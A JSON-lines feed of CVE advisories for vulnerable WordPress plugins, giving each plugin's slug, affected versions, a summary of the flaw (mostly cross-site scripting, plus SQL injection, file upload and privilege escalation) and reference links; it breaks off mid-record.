{"CVE_ID":"CVE-2023-5141","slug":"bsk-contact-form-7-blacklist","versionImpact":"1.0.1","description":"The BSK Contact Form 7 Blacklist WordPress plugin through 1.0.1 does not sanitise and escape the inserted_count parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9997fe8d-8027-4ae0-9885-a1f5565f2d1a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9997fe8d-8027-4ae0-9885-a1f5565f2d1a\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1693","slug":"sp-client-document-manager","versionImpact":"4.70","description":"The SP Project & Document Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the cdm_save_category AJAX action in all versions up to, and including, 4.70. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary folder name that do not belong to them.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sp-client-document-manager\\\/trunk\\\/classes\\\/ajax.php#L786\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sp-client-document-manager\\\/trunk\\\/classes\\\/ajax.php#L786\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1951ad6c-17b5-44ae-85e2-376b99df742e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1951ad6c-17b5-44ae-85e2-376b99df742e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3563","slug":"genesis-blocks","versionImpact":"3.1.3","description":"The Genesis Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Sharing block in all versions up to, and including, 3.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef21fae3-65ef-43e8-9792-619dfc4dfda8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef21fae3-65ef-43e8-9792-619dfc4dfda8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/genesis-blocks\\\/trunk\\\/src\\\/blocks\\\/block-sharing\\\/index.php#L268\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/genesis-blocks\\\/trunk\\\/src\\\/blocks\\\/block-sharing\\\/index.php#L268\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6223","slug":"send-email-only-on-reply-to-my-comment","versionImpact":"1.0.6","description":"The Send email only on Reply to My Comment WordPress plugin through 1.0.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cf7d1cea-0bf4-4b9e-bab4-71d5719a7c30\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cf7d1cea-0bf4-4b9e-bab4-71d5719a7c30\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3944","slug":"wp-todo","versionImpact":"1.3.0","description":"The WP To Do plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b36b9b8a-41b0-4b57-92c7-5acebe2b0bae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b36b9b8a-41b0-4b57-92c7-5acebe2b0bae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L225\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L225\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7296","slug":"bigbluebutton","versionImpact":"3.0.0-beta.4","description":"The BigBlueButton plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the the moderator code and viewer code fields in versions up to, and including, 3.0.0-beta.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with author privileges or higher to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f829d21-5347-46ec-9218-2b3cbe7d7b95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f829d21-5347-46ec-9218-2b3cbe7d7b95?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bigbluebutton\\\/trunk\\\/public\\\/partials\\\/bigbluebutton-join-display.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bigbluebutton\\\/trunk\\\/public\\\/partials\\\/bigbluebutton-join-display.php#L26\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13459","slug":"fusedesk","versionImpact":"6.6.1","description":"The FuseDesk plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fusedesk_newcase' shortcode in all versions up to, and including, 6.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fusedesk\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fusedesk\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a69a99af-3d1d-4ad2-b6b5-e4fcea56be51?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a69a99af-3d1d-4ad2-b6b5-e4fcea56be51?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13632","slug":"wp-extra-fields","versionImpact":"1.0.1","description":"The WP Extra Fields WordPress plugin through 1.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85c5b465-afce-4c68-b5e3-214ec4b5c9f2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85c5b465-afce-4c68-b5e3-214ec4b5c9f2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13604","slug":"kb-support","versionImpact":"1.7.4","description":"The KB Support \u2013 Customer Support Ticket & Helpdesk Plugin, Knowledge Base Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.7.4 via the 'kbs' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/kbs directory which can contain file attachments included in support tickets. The vulnerability was partially patched in version 1.7.3.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/files.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kb-support\\\/trunk\\\/includes\\\/files.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231596\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231596\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3a058d6-ca9e-4241-b6dd-307efa7689ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3a058d6-ca9e-4241-b6dd-307efa7689ab?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4168","slug":"subpage-view","versionImpact":"1.3.3","description":"The Subpage List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'subpages' shortcode in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subpage-view\\\/trunk\\\/inc\\\/class-subpage-list-shortcode.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subpage-view\\\/trunk\\\/inc\\\/class-subpage-list-shortcode.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aca48ddf-4256-4a55-bff5-1718110147dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aca48ddf-4256-4a55-bff5-1718110147dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6679","slug":"bit-form","versionImpact":"2.20.4","description":"The Bit Form builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 2.20.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. For this to be exploitable, the PRO version needs to be installed and activated as well. Additionally a form with an advanced file upload element needs to be published.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3343461%40bit-form%2Ftrunk&old=3336733%40bit-form%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3343461%40bit-form%2Ftrunk&old=3336733%40bit-form%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-form\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-form\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e2e294f-904b-4674-8baf-d3a9a260d634?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e2e294f-904b-4674-8baf-d3a9a260d634?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0446","slug":"youtube-channel","versionImpact":"3.0.12.1","description":"The My YouTube Channel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its settings parameters in versions up to, and including, 3.0.12.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2844200%40youtube-channel&new=2844200%40youtube-channel&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2844200%40youtube-channel&new=2844200%40youtube-channel&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d979f899-8cdc-4230-b1b5-865c025dc86a\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d979f899-8cdc-4230-b1b5-865c025dc86a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0076","slug":"download-attachments","versionImpact":"1.2.24","description":"The Download Attachments WordPress plugin through 1.2.24 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0a44f8a-877c-40df-a3ba-b9b806ffb772\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a0a44f8a-877c-40df-a3ba-b9b806ffb772\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7233","slug":"gigpress","versionImpact":"2.3.29","description":"The GigPress WordPress plugin through 2.3.29 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/585cb2f2-7adc-431f-89d4-4e947f16af18\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/585cb2f2-7adc-431f-89d4-4e947f16af18\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0386","slug":"weforms","versionImpact":"1.6.21","description":"The weForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Referer' HTTP header in all versions up to, and including, 1.6.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f436ab65-a59c-4b2a-abc8-a7fc038678dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f436ab65-a59c-4b2a-abc8-a7fc038678dd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047406%40weforms&new=3047406%40weforms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3047406%40weforms&new=3047406%40weforms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4083","slug":"fd-elementor-imagebox","versionImpact":"1.0.0","description":"The Easy Restaurant Table Booking plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation when saving settings. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1492440d-c6c8-46c0-bc88-c9e3f9933ad4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1492440d-c6c8-46c0-bc88-c9e3f9933ad4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fd-elementor-imagebox\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fd-elementor-imagebox\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4936","slug":"canto","versionImpact":"3.0.8","description":"The Canto plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 3.0.8 via the abspath parameter. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. This required allow_url_include to be enabled on the target site in order to exploit.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95a68ae0-36da-499b-a09d-4c91db8aa338?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95a68ae0-36da-499b-a09d-4c91db8aa338?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/canto\\\/trunk\\\/includes\\\/lib\\\/sizes.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/canto\\\/trunk\\\/includes\\\/lib\\\/sizes.php#L15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6021","slug":"donations-block","versionImpact":"2.1.0","description":"The Donation Block For PayPal WordPress plugin through 2.1.0 does not sanitise and escape form submissions, leading to a stored cross-site scripting vulnerability","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9d83cffd-7dcd-4301-8d4d-3043b14e05b5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9d83cffd-7dcd-4301-8d4d-3043b14e05b5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13456","slug":"n-media-wp-simple-quiz","versionImpact":"2.0","description":"The Easy Quiz Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wqt-question' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/n-media-wp-simple-quiz\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/n-media-wp-simple-quiz\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/788c94a7-a8d6-4ae3-b4ca-f5c60e536f57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/788c94a7-a8d6-4ae3-b4ca-f5c60e536f57?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13631","slug":"om-stripe","versionImpact":"02.00.00","description":"The Om Stripe WordPress plugin through 02.00.00 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c991fdd0-cb9d-43ea-bafa-df3b2e806013\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c991fdd0-cb9d-43ea-bafa-df3b2e806013\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3918","slug":"job-listings","description":"The Job Listings plugin for WordPress is vulnerable to Privilege Escalation due to improper authorization within the register_action() function in versions 0.1 to 0.1.1. The plugin\u2019s registration handler reads the client-supplied $_POST['user_role'] and passes it directly to wp_insert_user() without restricting to a safe set of roles.  This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/job-listings\\\/trunk\\\/includes\\\/forms\\\/class-jlt-form-member.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/job-listings\\\/trunk\\\/includes\\\/forms\\\/class-jlt-form-member.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/job-listings\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/job-listings\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9cd43f5-c3d0-4eb2-9c18-1af2edca37ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9cd43f5-c3d0-4eb2-9c18-1af2edca37ff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6012","slug":"auto-attachments","versionImpact":"1.8.5","description":"The Auto Attachments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.8.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/auto-attachments\\\/trunk\\\/auto-attachments.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/auto-attachments\\\/trunk\\\/auto-attachments.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/978c13e5-d30c-4caa-ab6d-256f2517fd79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/978c13e5-d30c-4caa-ab6d-256f2517fd79?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0069","slug":"wpaudio-mp3-player","versionImpact":"4.0.2","description":"The WPaudio MP3 Player WordPress plugin through 4.0.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9f00bcb-3746-4a9d-a222-4d532e84615f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9f00bcb-3746-4a9d-a222-4d532e84615f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5108","slug":"easy-newsletter-signups","versionImpact":"1.0.4","description":"The Easy Newsletter Signups WordPress plugin through 1.0.4 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b277929-e88b-4ab6-9190-526e75f5ce7a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b277929-e88b-4ab6-9190-526e75f5ce7a\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6321","slug":"scrollto-bottom","versionImpact":"1.1.1","description":"The ScrollTo Bottom plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 1.1.1. This is due to missing nonce validation and missing file type validation in the 'options_page' function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d560f28f-899c-44cf-8640-55647c1de7dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d560f28f-899c-44cf-8640-55647c1de7dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scrollto-bottom\\\/trunk\\\/scrollto-bottom.php?rev=516875#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scrollto-bottom\\\/trunk\\\/scrollto-bottom.php?rev=516875#L256\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5975","slug":"cz-loan-management","versionImpact":"1.1","description":"The CZ Loan Management WordPress plugin through 1.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/68f81943-b007-49c8-be9c-d0405b2ba4cf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/68f81943-b007-49c8-be9c-d0405b2ba4cf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9178","slug":"woo-floating-cart-lite","versionImpact":"2.8.2","description":"The XT Floating Cart for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.8.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/921be7ff-3d38-4b69-8a1f-a64d5aabd2dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/921be7ff-3d38-4b69-8a1f-a64d5aabd2dd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-floating-cart-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-floating-cart-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-floating-cart-lite\\\/trunk\\\/xt-framework\\\/includes\\\/customizer\\\/class-customizer.php#L1012\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-floating-cart-lite\\\/trunk\\\/xt-framework\\\/includes\\\/customizer\\\/class-customizer.php#L1012\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181762\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181762\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11501","slug":"multi-gallery","versionImpact":"1.3","description":"The Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3 via deserialization of untrusted input from wd_gallery_$id parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 